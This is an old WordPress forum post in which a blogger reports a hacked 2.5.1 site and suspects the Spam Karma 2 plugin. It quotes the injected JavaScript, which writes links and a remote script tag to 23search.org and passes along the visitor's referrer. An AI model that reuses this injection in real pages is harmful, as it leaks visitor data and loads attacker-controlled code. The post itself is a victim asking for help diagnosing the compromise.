Hacked via the Spam Karma 2 (SK2) plugin? (1 post)

  1. edelen
    Posted 7 years ago #

    My 2.5.1 blog was hacked recently, adding links to 23search.com and other places. A malicious script was running in a div near the footer of the blog:

    document.write("<H1><a href='http://www.23search.org/?q="+escape(document.referrer)+"'>Proceed to results</a></H1>");
    document.write(" src=\"http://www.23search.org/?j="+escape(document.referrer)+"\"\>");
    </script><h1><a href="http://www.23search.org/?q=http%3A//{my blog's URL}/">Proceed to results</a></h1><script src="http://www.23search.org/?j= ...

    And so on.

    When I tried to find how it had been done, I traced the hack to my plugins. To my surprise, disabling Spam Karma 2 foiled the hack.

    Has anyone encountered this hack before? I'm not sure if it is SK2 itself or one of its plugins, but something is not right.

    And yeah, I feel less secure without SK2, but how can I trust it anymore?


Topic Closed

This topic has been closed to new replies.

About this Topic

  • RSS feed for this topic
  • Started 7 years ago by edelen
  • This topic is not a support question
  • WordPress version: 2.5.1